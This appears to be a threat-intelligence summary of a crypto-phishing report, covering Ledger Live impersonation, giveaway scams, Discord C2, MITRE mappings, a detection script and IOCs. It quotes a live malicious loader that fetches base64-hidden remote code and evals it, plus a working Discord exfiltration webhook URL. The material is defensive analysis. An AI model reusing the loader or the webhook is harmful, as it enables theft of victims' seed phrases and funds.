A Whirlwind Tour Of Crypto Phishing

The article surveys how crypto phishing relies on malvertising, social-media campaigns, and fake wallet prompts to steal seed phrases, wallets, and NFTs, from Ledger impersonations to fake Vitalik Buterin accounts and ApeCoin scams. It also covers techniques such as cloaked Ledger Live pages, Discord webhooks used for C2, and giveaway scams, and provides concrete IOCs and examples.
#Ledger #VitalikButerin #ApeCoin #ukrainethereum #GangsterAllStar #Discord

Keypoints

  • Malvertising campaigns drive users to cloaked phishing pages masquerading as Ledger Live, with the aim of harvesting seed phrases.
  • Phishing chains often prompt users to connect wallets and enter seed phrases, enabling theft of crypto and NFTs via fake wallets or approvals.
  • Public social-media lures (e.g., Vitalik Buterin impersonations and giveaway scams) are used to funnel victims to malicious sites and token grabs.
  • Phishing campaigns combine low-tech web pages with convincing branding and timing to maximize impact, including brand impersonation and riding the hype around newly launched tokens (e.g., ApeCoin).
  • Multiple brands are targeted (Ledger, Coinbase, Axie Infinity), with Axie Infinity identified as a hot target in recent weeks.
  • Attackers use a mix of malvertising, fake ads, and Discord-based C2 infrastructure to exfiltrate data and coordinate theft campaigns.
  • The evidence spans ad networks, domain registrations, and open-source indicators (including VirusTotal/OTX references) that defenders can use to track and analyze these campaigns.

MITRE Techniques

  • [T1189] Drive-by Compromise – Malvertising drives users to phishing content; “search ads that target Ledger keywords” and campaigns that push toward theft.
  • [T1566.002] Phishing: Spearphishing Link – Cloaked phishing pages masquerade as Ledger Live and prompt users to enter seed phrases; “These ads link to cloaked phishing pages that masquerade as Ledger Live and try to get victims to enter their seed phrase.”
  • [T1059.007] JavaScript – A one-line in-page loader fetches a remote script from a base64-encoded URL and passes the response to eval; “javascript:fetch(/*xmarksthespot.*/atob(/*Whitelist.*/'aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTM1MTA4MzQ4MzYwMTM0NjY2Lzk1MTkxMDEzMDY5NjQ3ODg4MC94Lmpz')).then(leaving => leaving.text()).then(successfully => eval(successfully))”
  • [T1071.001] Web Protocols – Use of Discord webhooks and web-based C2 channels; “https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF” to exfiltrate data.
  • [T1041] Exfiltration Over C2 Channel – Data (seed phrases, balance/NFT info) posted back to C2; “post those back home to the C2.”
  • [T1567.002] Exfiltration to Web Service – Use of web-based endpoints (Discord webhook) to transfer stolen data.
  • [T1027] Obfuscated/Encoded Files and Information – Inline obfuscated payloads and dynamic code loading (atob and eval usage) to conceal actions.
  • [T1119] Automated Collection – The malware scans the victim’s drive for .txt files containing keywords like ‘key’, ‘wallet’, and ‘seed’ and posts them to C2; “scans the Victim’s drive for .txt files that contain the keywords ‘key’, ‘wallet’, and ‘seed’ …”
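As an added defender-side example (not code from the Confiant article), the following Python strips the /* */ comments from the loader quoted under T1059.007, decodes its atob() literal, and flags the fetch/eval remote-code pattern (T1059.007, T1027); it also extracts the Discord webhook URL (T1071.001) from proxy-log lines. The loader string and webhook URL are the ones on this page; the log timestamps and field layout are constructed.

```python
import base64
import re
from urllib.parse import urlparse

# Loader quoted on this page (ASCII quotes; a curly-quoted rendering is also accepted below).
SAMPLE_LOADER = ("javascript:fetch(/*xmarksthespot.*/atob(/*Whitelist.*/"
                 "'aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTM1MTA4MzQ4MzYwMTM0NjY2Lzk1MTkxMDEzMDY5NjQ3ODg4MC94Lmpz'"
                 ")).then(leaving => leaving.text()).then(successfully => eval(successfully))")
# Constructed proxy-log lines carrying the page's CDN path and webhook URL.
SAMPLE_LOG = """\
2022-03-12T10:41:03Z proxy host=cdn.discordapp.com uri=/attachments/935108348360134666/951910130696478880/x.js
2022-03-12T10:41:09Z proxy method=POST url=https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF
"""

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
ATOB_LITERAL = re.compile(r"atob\(\s*[\"'‘’`]([A-Za-z0-9+/=]+)[\"'‘’`]\s*\)")
WEBHOOK_URL = re.compile(r"https://discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+")
DISCORD_HOSTS = {"discord.com", "discordapp.com", "cdn.discordapp.com"}

def decode_atob_literals(js):
    """Decode base64 literals passed to atob(), after removing the /* */
    comments the loader interleaves to defeat naive string matching."""
    decoded = []
    for b64 in ATOB_LITERAL.findall(BLOCK_COMMENT.sub("", js)):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded

def analyze_loader(js):
    """Flag the fetch -> atob -> eval remote-code loader pattern and report
    where the second stage is hosted."""
    cleaned = BLOCK_COMMENT.sub("", js)
    urls = [u for u in decode_atob_literals(js) if u.startswith(("http://", "https://"))]
    hosts = {urlparse(u).hostname for u in urls}
    findings = {
        "bookmarklet": cleaned.lstrip().lower().startswith("javascript:"),
        "fetch": "fetch(" in cleaned,
        "eval": re.search(r"\b(?:eval|Function)\s*\(", cleaned) is not None,
        "discord_hosted": bool(hosts & DISCORD_HOSTS),
        "urls": urls,
    }
    findings["verdict"] = "remote-code-loader" if findings["fetch"] and findings["eval"] and urls else "benign-or-unknown"
    return findings

def find_webhook_urls(text):
    """Extract Discord webhook URLs (the exfil channel under T1071.001) from logs or scripts."""
    return sorted(set(WEBHOOK_URL.findall(text)))
```

Feeding the decoded second-stage URL and the webhook URL into a proxy blocklist or SIEM watchlist catches both the download and the exfiltration leg of the chain.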

Indicators of Compromise

  • [Domain] ukrainethereum.com – phishing domain used in deceptive Ukraine-related crypto campaigns
  • [Domain] ape-coin.net – domain associated with ApeCoin-themed phishing content
  • [Domain] register.gangsterallstar.com – deceptive site mimicking Gangster All Star NFT project
  • [Domain] discord.com – used as part of webhook/C2 infrastructure
  • [Domain] cdn.discordapp.com – media hosting domain referenced in Discord-related activity
  • [URL] https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF – webhook used for data exfiltration
  • [IP] 185.215.113.15 – IP referenced in AlienVault indicator
  • [Hash] 0xed4f4f461de76264299429909cfb102283b47310 – 0x-prefixed 40-hex-digit value (Ethereum-address format) noted in the VT/OTX context
  • [URL] https://www.virustotal.com/gui/file/581b56dea8f59f59e14d10c1d417e94d6432901494fd9fa315a7fe53c0f13f26/details – VirusTotal indicator
  • [URL] https://otx.alienvault.com/indicator/ip/185.215.113.15 – AlienVault indicator page
  • [URL] https://www.tomsguide.com/news/discord-spidey-bot-malware-is-stealing-usernames-passwords – external report referenced
  • [File name] Exact_sizes_to_order_from_the_artist.rar – malware payload artifact described in the article
  • [File name] Exact sizes to order from the artist_document.pdf.pif – payload disguised with a double extension (.pif is a Windows executable type)

Read more: https://blog.confiant.com/a-whirlwind-tour-of-crypto-phishing-8628da0a9e38